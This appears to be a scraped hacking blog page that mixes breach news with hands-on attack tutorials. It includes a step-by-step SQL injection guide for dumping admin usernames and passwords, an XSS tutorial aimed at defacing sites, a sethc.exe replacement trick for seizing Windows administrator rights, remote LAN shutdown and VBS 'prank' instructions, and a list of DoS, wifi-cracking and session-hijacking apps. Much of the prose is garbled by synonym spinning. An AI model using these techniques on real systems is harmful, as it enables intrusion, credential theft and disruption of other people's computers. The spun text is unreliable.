breaking

World View

World View

Menarik

Menarik

Khas Nusantara

Khas Nusantara

Hey Guyz,
Today i saw a script that can be use for a small prank with your friends. in this script systems caps lock LED blink continuously. so here are the steps for creating this prank :

1) Open Notepad 

2) Type -: 

Set wshShell =wscript.CreateObject("WScript.Shell") 
do 
wscript.sleep 100 
wshshell.sendkeys "{CAPSLOCK}" 
loop 

3) Now, Save the file as "Caps.VBS" 
4) Now open this file on your PC or send this file to your friends PC where you want to see these CAPS blinking. It is funny trick which just blinks your CAPSLOCK light continuously. Note: Save the name with extension of VBS in inverted commas. 

Note: If you want to end this script simply Open Task Manager(Alt + Ctrl + Delete). Under Processes end the process “wscript.exe” or it simply ends after you restart your PC.

Source


The Syrian Electronic Army again attacked on Microsoft's official Blog & Social Accounts.
According to Mashable a member of SEA said 
"We can only say that's just the beginning," an SEA member called "Syrian Eagle" told Mashable in an email. The group also hacked an Xbox Twitter account (@XboxSupport) earlier Saturday, The Drum reported.
Here are three different snapshots of Microsoft's blogs.


  • Official Blog


  • Twitter Account  

  • Confirmation From Microsoft


Source : Mashable
Hey Guyz,
NASA's 8 SubDomains Hacked & Defaced by Italian Hackers.
In Defacement page hackers didn't mention any reason for this attack. Here are 8 subdomains which affected. 



  • spaceshop.arc.nasa.gov
  • bt4lbleo.arc.nasa.gov
  • sphereswg.arc.nasa.gov
  • ppmovm.arc.nasa.gov
  • ppmo.arc.nasa.gov
  • ngss-trs.arc.nasa.gov
  • ngss.arc.nasa.gov
  • admms.arc.nasa.gov
Hey Folks,
do you know whose country's hackers are responsible for most cyber attacks ?
i am gonna tell you top most countries in hacking attacks.




1. China 
China accounted for 41 % of the world's attack traffic throughout the fourth quarter of last year, creating the country the highest supply of cyber assaults. China's share exaggerated from 33 % within the previous quarter and 13 % within the year-ago amount, consistent with Akamai. Investigations have discovered a complicated hacker network in China. Some members ar connected to China's military, although the extent of those official operations is unknown. the govt and its state-run media still deny China's involvement in international hacking incidents.

2. U.S.A

The U.S. accounted for 10% of the world's attack traffic throughout the fourth quarter of last year, golf shot the country in 2d place. The U.S.'s share born from thirteen p.c within the previous quarter and matched its share from the year-ago amount. The U.S. is home to members of a number of the world's most disreputable hacker teams, as well as Anonymous and AntiSec. 

3. Turkey

Turkey accounted for for .7 % of the world's attack traffic throughout the fourth quarter of last year, putt the country in third place. Turkey's share multiplied from four.3 p.c within the previous quarter and fell from five.6 p.c within the year-ago amount.

4. Russia

Russia accounted for 4.3 % of the world's attack traffic throughout the fourth quarter of last year, golf shot the country in fourth place. Russia's share weakened from four.7 p.c within the previous quarter and half-dozen.8 p.c within the year-ago amount. At least forty corporations as well as Apple, Facebook and Twitter were targeted in malware attacks joined to a cyber criminal cluster primarily based in Russia or eastern Europe.

5. Тaiwan 

Taiwan, that could be a province of China, accounted for 3.7% of the world's attack traffic throughout the fourth quarter of last year, putt the region in fifth place. Taiwan's share born from four.5 p.c within the previous quarter and seven.5 p.c within the year-ago amount. While Taiwan could be a high supply of attack traffic, it's additionally a preferred target. analysis by the safety firm Sophos found that twelve.7 p.c of computers in Taiwan had been attacked by malware throughout a three-month study last year

6. Brazil
Brazil accounted for 3.3 % of the world's attack traffic throughout the fourth quarter of last year, golf shot the country in sixth place. Brazil's share fell from three.8 % within the previous quarter and four.4 % within the year-ago amount. 

7. Romania 
Romania accounted for 2.8 % of the world's attack traffic throughout the fourth quarter of last year, golf shot the country in seventh place. Romania's share enhanced from a pair of.7 % within the previous quarter and a pair of.6 % within the year-ago amount. Several news reports have represented Ramnicu Valcea, a city in Balkan nation, as a haven for cyber criminals. 

8. India 
India accounted for 2.3 % of the world's attack traffic throughout the fourth quarter of last year, golf stroke the country in eighth place. India's share cut from two.5 % within the previous quarter and three % within the year-ago amount.

9.Italy
Italy accounted for 1.6 % of the world's attack traffic within the fourth quarter of last year, putt the country in ninth place. Italy's share decreased slightly from one.7 % within the previous quarter and one.9 % within the year-ago amount. 

10. Hungary
Hungary accounted for 1.4 % of the world's attack traffic within the fourth quarter of last year, golf stroke the country in tenth place. It narrowly beat out Republic of Korea. Hungary's proportion was unchanged from the previous and year-ago quarters. 

Source:Bloomberg
Hey Guyz,
Here is the Complete tutorial set of 58 videos for a beginner that will teach you how to Hack and Learn Ethical Hacking. I appreciate this tutorial makers for create such a wonderful video series.
Please use this Videos for learning/study purpose only. Make sure you dont harm anyone.

Content 
  • Sniffing Remote Router Traffic VIA GRE Tunnels (Hi-Res) 
  • How to Decrypt SSL encrypted traffic using a MAN in the Middle Attack (Auditor) 
  • Buffer overflows Pt. 3 by IDESpinner 
  • 128 Bit WEP Cracking with Injection! 
  • Buffer overflows Pt. 2 by IDEspinner 
  • Basic NMAP Usage! 
  • Adding Modules to a Slax or Backtrack Live CD from Windows
you can download from here :
Part 1 (251MB)                 Part2(251MB)                Part3(189MB)


Dont forget to share ||
Source:Geek Tech
Hey Guyz,
As you know 76% People still using Windows Operating System. So i am gonna tell you 7 hidden-magic tricks of this operating System.



1. Play Movie in paint:
  Yes, you can play movies in MS Paint. How lets Check it out.


  • Open your favorite movie player and play the movie.(I played the .mpeg format in Windows Media Player) 
  • Hit "PrintScreen", keep playing the movie in the player,dont stop it. 
  • Open MsPaint. 
  • Select "Edit>Paste" Or Hit "CTRL+V" 
  • Presto! You can watch movie in Paint! 
  • But there are no Pause, Next, Previous, Stop etc. button.
2. Open My computer, My Documents automatically: 
  • Open regedit and goto: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi ndows NT\CurrentVersion\Winlogon 
  • In right-side pane, change value of "Userinit" to: C:\WINDOWS\system32\userinit.exe, 
       NOTE: If you have windows installed in other drives,                then change C:\ to that drive label. Now go to:
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Explorer\Advanced In right-side pane, change value of "PersistBrowsers" to '0'. 
Now log off windows and it should solve the problem.

3. Hack Administrator Account Using Guest Account:
  • First of all login through your guest account and open C:\WINDOWS\system32.
  • Now look for cmd.exe and sethc.exe
  • copy these both exe files and place it any safe location 
  • Now again go to C:\WINDOWS\system32, now rename cmd.exe into sethc.exe...... As sethc.exe is already exist, so a window will open... says..would you want to replace..... press yes...



  • Now Restart your system.
  • When login screen come.... press Shift key for 5 times.... then command prompt will open.
  • Now you can hack an administrator account in 2 way: By hacking recent administrator's account by changing its password. By giving Administrator's privileges to your guest account So decide what you want to do.... 
Now

if you choose 1st one i.e. "Hacking recent administrator's account by changing its password".>>> then go to my
post Hack administrator account and follow step 3 & 4 there.
Or 
if you choose 2nd one then write in command 
prompt: net localgroup administrators your_guest_account_name /add

Done :)

4.  Create CON Folder : 
 do you knw dat it is not possible to create a folder by name 'CON' (there are few others also i guess) as we create folders easily by any name. 
But if you want to create a folder by name CON, here's how u do it- 
  • Rename folder from the right click option..... 
  • Now press alt and press 255... 
  • press 255 frm the right sideof the key bords i.e., num pad now write con and then press enter, 
  • you'll see a con folder in ur pc.
5.Rename RecycleBin:
Its not quite possible for normal user to change Recycle Bin Name. So here is the to Rename RecycleBin.

  • Click Start / Run 
  • Type regedit and press enter.
  • Open the HKEY_CLASSES_ROOT folder
  • Open the CLSID folder
  • Open the {645FF040-5081-101B-9F08-00AA002F954E} folder 
  • Open the ShellFolder folder
  • Change the Attributes data value from 40 01 00 20 to 50 01 00 20. Once completed change the CallForAttributes dword value to 0x00000000 (double-click and change value data to 0). You must change both of these values to get the rename to appear. 
  • After performing the above steps you will be able to rename the icon like any other icon. Right-click the Recycle Bin icon on the desktop and click Rename and rename it to whatever you wish.
6. Automatic Window Refresh:
  • Type Regedit in run. 
  • In Registry editor window go toHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Update.
  • Create a new DWORD value, or modify the existing value, namedUpdateMode and set it to equal 0 for faster updates.
  • Restart Windows for the change to take effect.
7. Shutdown Any System on your Lan:
  • 1. Go to Start > Run and type in cmd
  • You will see the command prompt window . Now type in this command line. shutdown.exe -i And hit Enter. You will see remote shutdown Window. If you know someone’s IP on a computer in your Local Area network, type in their IP Address after clicking the add button. 
  • After entering the IP Address click OK . Now watch the person’s face as their computer shuts down.
Hey Guyz,

Adobe has simply disclosed that one of their servers has been hacked. While their investigations square measure still in progress, Adobe has shared a couple of details on what they believe may are accessed and obtained within the hack — and it’s an enormous one.
From what Adobe has shared up to now, it seems like the hackers had access to encrypted information for as several as two.9 million customers. whereas Adobe stresses that the information is encrypted which they “do not believe the attackers removed decrypted credit or charge account credit numbers”,
that information — encrypted or not — is unquestionably not one thing they need get into the wild. Adobe has nevertheless to disclose however that information was encrypted, thus it’s presently unclear simply however secure it's. Meanwhile, it additionally seems that the hackers might are able to access the ASCII text file for a minimum of 3 of Adobe’s products: athlete, ColdFusion, and ColdFusion Builder. This goes hand in hand with a report from Brian Sir Hans Adolf Krebs this morning, World Health Organization noted that he and a fellow scientist had discovered a minimum of 40GB of Adobe ASCII text file obtainable on a hacking group’s personal server. Beyond the apparent business implications of getting your otherwise latched down ASCII text file floating around within the wild, there square measure probably large security issues here. Once you’ve got the ASCII text file for Associate in Nursing application in hand, it becomes abundant easier to catch the furtive lil’ security disasters that may otherwise go ignored. mix this new potential for giant zero-day exploits with the numerous, several various Adobe athlete (Adobe’s official PDF reader) installs round the world, and this all starts to urge pretty worrisome.
YEX3MMC2WXKX
Hi Guyz,
SQL Injection attacks are a unit of code injections that exploit the info layer of the applying. this is often most typically the MySQL vulnerabilty, however there are a unit techniques to hold out this attack in alternative databases like Oracle. during this tutorial i will be able to be showing you the steps to hold out the attack on a MySQL info.


This is tutorial is only for Education purpose this blog is not responsible for any hack attempts by anyone on any website.



Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5


Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database


For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.



Hey Folks,
Yesterday iOS Released. After people's mixed reaction still iOS getting Good Reviews. But Today




Jose Rodriguez, a 36-year-old soldier living in Spain’s Canary Islands, has found a security vulnerability in iOS seven that permits anyone to bypass its lockscreen in seconds to access photos, email, Twitter, and more. He shared the technique with ME, beside the video on below.


As the video shows, anyone will exploit the bug by swiping up on lockscreen to access the phone’s “control center,” and so gap the timepiece. Holding the phone’s sleep button brings up the choice to power it off with a swipe. Instead, the unwelcome person will faucet “cancel” and double click the house button to enter the phone’s multitasking screen. that provides access to its camera and keep photos, beside the power to share those photos from the user’s accounts, primarily permitting anyone UN agency grabs the phone to hijack the user’s email, Twitter, or Flickr Account.

"Rodriguez includes a journal of finding lockscreen bypass bugs in iOS, several of that he says he mammary gland up whereas killing time in his previous job as a driver for presidency officers. “I had lots of your time to seem at the scenery, break the phone or write poetry whereas anticipating my boss, and that i don’t write poetry and already knew the landscape by memory,” he tells ME via instant message and Google translate. therefore he spent hours “trying everything that goes through my head…I submit my iPhone to cruel strategies of torture.”"



Hey Folks,


Another Security Researcher from India name as "Ishwar Prasad Bhat" have discover the essential vulnerability on the Indian eBay web site (www.ebay.in). This vulnerability permits the users to shop for any product of what ever quantity simply in Rs. 1 ($0.01).






Yeah that is right, any product from eBay in precisely Rs.1. Ishwar have reported the vulerability to the eBay's team, sadly Ishwar did not get any reward quantity for this as eBay did not have any Bug Bounty Program as like Facebook, Google and Microsoft.


Now the eBay security team have patched the vulnerability yesterday, as Ishwar according.
But eBay team have acknowledged his name on the accountable speech act Acknowledgements List. Check the list of the man of science name on the eBay Acknowledged page.

Ishwar is simply eighteen year Old and 1st year student of Veltechmulti school Engineering collage at Avadi,Chennai,,India.

This is not the primary time that Indian researcher have Reported vulnerability on the key organisation sites. Earlier another Indian man of science, 

Arul Kumar have according a essential vulnerability on Facebook that enables the aggressor to delete different users photos. For this vulnerability Facebook rewarded $12,500 to Arul Kumar as a bug bounty reward.


Hey Folks,

If you are a android user and willing to learn hacking using your Smartphone , then these 10 most 
Popular Android apps used by Hackers can help you. here are that apps :

Caution : These applications area unit for academic functions solely. No warranties of any kind area unit expressed or tacit. Use at your own risk!



 In the Defcon 2011 an android tool released by a security analyst that app called cum tool called "The Android Network Toolkit". Penetration Testers and Ethical Hackers are mainly target behind this development that help them to test any NETWORK and VULNERABILITIES using their Smartphones.this app has different module in it that help hackers to find possible attacks in Network. Man-In-Middle Attacks is one of its speciality. an Israeli Security Firm Developed this app named "Zimperium". 


2. Nmap for Android :

in 2011 Nmap for Android (Network Mapper) Released. It is one of the best (Network Scanner/Open Port finder) Android Application which is basically developed for UNIX Operating System But Developer made it available for Windows & Android Also.It has a feature in which once your post scanning finishes you will get an e-mail with the scanning result.this is not an official app.

3.FaceNIff-Session Hijecker



If you are a Pen-Tester/Ethical Hacker using a open Wifi (Without any Password) then this app is perfect for you. it is similar like Firefox Plugin FireSheep . using this Android App you can hijack sessions of almost any social networking websites including Facebook & Twiiter mainly. Faceniff Developed by bartosz Ponurkiewicz who has developed Firesheep too.

4. AnDOSid




AnDOSid is an amazing Android App that help Ethical Hackers to do DOS(Denial of Service) attacks. As Denial of service attack is most dangerous attack as it takes down the server and cause of a server failure. AnDOSid allows Security Professionals to simulate DOS( HTTP post flood attack ) and DDOS on a web server .

5. SSHDroid / Android Secure Shell :



SSH (Secure Shell) is the best protocol that provide extra security while you are connecting to a remote machine.SSHDroid will let you know to connect your device from a PC and execute commands (Like"terminal" and "dab shell").

6.DroidSQLi :



 It is first automated SQL Injection Tool for Android Smartphones. It help Penetration Tester to test MYSQL based web application against SQL Injection Attacks.
Blind SQL Injection ,Error Based SQLi Injection & Normal Injection are the main feature of it. 

7.Wifi Hacker Android Best Version :



It is an Android App Cum Hacking Tool Using you can crack almost any wifi network in range of your phone . It Supports WEP/WPA/WPA2 Encryption Methods.
Hey Guys,

Cross Site Scripting aka XSS is one of the common vulnerability in any web application. so today i'll explain you what exactly XSS is and how we can use this vulnerability to blow any web app who is suffering from this vulnerability.



What is XSS (Cross Site Scripting)- As i have mentioned above it is one of the common vulnerability in web app which allows Hacker or Attacker to insert malicious code into web app.using this vulnerability hacker can also change the index page by adding some code into url. this kind of venerability is also helpful for attacker to bypass web security and can also applicable in "Phishing" on falls user.

Xss Types : This vulnerability allows 3 types of XSS attacks given below :-

1.DOM Based 
2.NON Persistent 
3.Persistent

What is "DOM Based XSS" ??
DOM (Document Object Model Based) XSS use by an Attacker to work on victim's local machine not on a website.various operating systems usually includes HTML pages created for different purpose but as long as humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

DOM Based XSS Affect victim's local machine in this ways :
- The attacker creates a well builded malicious website
- The ingenuous user opens that site
- The user has a vulnerable page on his machine
- The attacker’s website sends commands to the vulnerable HTML page
- The vulnerable local page execute that commands with the user’s privileges
on that machine.
- The attacker easily gain control on the victim computer.

Non-Persistent : This is the most common vulnerability can be found in WebApp. It's name Justify its process as it works on an immediate HTTP response from victim website.
It show up when webpage get the data feed by attacker .it will generate a result page 
for the attacker himself. out of this attacker can provide any malicious code and try to make the server executable in order to obtain some result.
we can get such websites which is vulnerable for this NON Persistent XSS.

 Persistent : The persistent XSS vulnerabilities are Similar like (Non-persistent XSS), as a result of each works on a victim web site and tries to hack users informations and therefore the distinction is that in websites susceptible to Persistent XSS the offender doesn’t got to give the crafted address to the users, as a result of the web site itself permits to users to insert mounted knowledge into the system: this is often the case for instance of “guestbooks”. typically the users uses that sort of tool to go away messages to the closely-held of the web site and at a primary look it doesn’t appears one thing dangerous, however if Hacker discover that the system is vulnerable will insert some malicious code in his message and let ALL guests to be victim of that.
This works once the tool provided (the guestbook within the example) doesn’t do any check on the content of the inserted message: it simply inserts the info provided from the user into the result page.

How to notice XSS Vulnerbilitys ?

Well begin to finding these vulnerbilitys you'll be able to start finding out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s, there are too several to say.
Using ‘Google Dorks’ to form the finding easyier, Ok if you wanna get down, goto google.com and search inurl:”search.php?q=” currently that's a typical page and has alot of results. additionally note that the majority sites have XSS vulnerbilitys, its simply having a decent eye, and a few smart information on the way to bypass there filteration.

Basics of XSS
Well currently lets begin learning some Actual ways, the foremost common used XSS injection is :
alert(”The Hacker News”)
now this can alert a popup message, locution “The Hacker News” while not quotes.
So,use “search.php?q=” and you'll straightforward strive the subsequent on an internet site with a similar issue,
http://website.com/search.php?q=alert(”Technoparadise.in”)
there square measure smart possibilities of it operating, however dont be disturbed if it dont, simply strive diffrent sites. you'll insert HTML not simply javascript :

http://website.com/search.php?q=

if you see the daring text on the page and newlines then you is aware of its vulnerable.
now a way to deface an internet site exploitation XSS …
njoy 


Here is two examples


This Post is only for Educational purpose.it does not relate with any hacking attempt on any website by anyone.
Hey Guyz,
Vodafone Germany recently accepted that 2 million of its customers bank details stolen in a Hacking Attack. 



in stolen details  customers' names, gender, birthdates and addresses as well as their bank account and branch numbers are included ,  but not their mobile phone numbers, passwords, PIN numbers or credit card details. as said by the senior employees.


That means hacker needed password to hack accounts completely.

Vodafone high authority warned to its customers that beware of phishing attacks in which hacker can use fake tricky emails to grab customers passwords.

only Germany customers affected in this Hack.any way they can contact by email.
Hey Folks,
This is too irritating when you try to open some social websites in your school or college and your browser just say "Access Denied". and for solving such problem you check for proxy server but you afraid to use that because there are chances to leak your login credentials when you use such unknown proxy servers. so why dont you create your own proxy server. here is the way by you can create your own server like App-spot

Step 1: First of all you need to install python in your system which you can download from HERE.

Step 2: Now you need to install SDK called "Google App Engine SDK" which you can download from HERE.
Step 3: After these two installation go to appengine.google.com and login using your gmail account.
Step 4: Now Click on "Create Application" ,it will ask for your mobile number. As this is your first time ,google will verify you and send a verification code to your mobile number.
Simply verify yourself.

Step 5: Now Choose a Subdomain for your proxy server like your-domain-name.appspot.in.
like ion below example "Web-proxy-hh" used.

Step 6: Now Download this ZIP file that contain some python scripts and some HTML files that needed for your server  and extract that ZIP file.

Step 7: Open that extract folder and find a file named "app.yaml" and open it where you can find "web-proxy-hh" in the file, rename it as per your subdomain name "your-domain-name" as below image.



Step 8: Now open "Google App Engine Launcher" which you had installed before.It may show you and error message just ignore that and start the "Edit > Preferences" and change and save it as shown in image below.


Step 9: Now navigate to "File > Add Existing Application".

Step 10:Now click "Browse" button and navigate and select and add the folder which you had extracted your downloaded scripts earlier. Make sure that all the 5 scripts are in that folder.
  


Step 11: After its done, Just click on "Deploy" button and enter your gmail username and password and click "OK". After this you will see the window like below.



Step 12: Now after a few seconds launch your web browser and type the URL of your proxy server in the address bar and press enter. your-domain-name.appspot.in

Tada your Proxy is ready.                                                                                   Source: Snap Hackers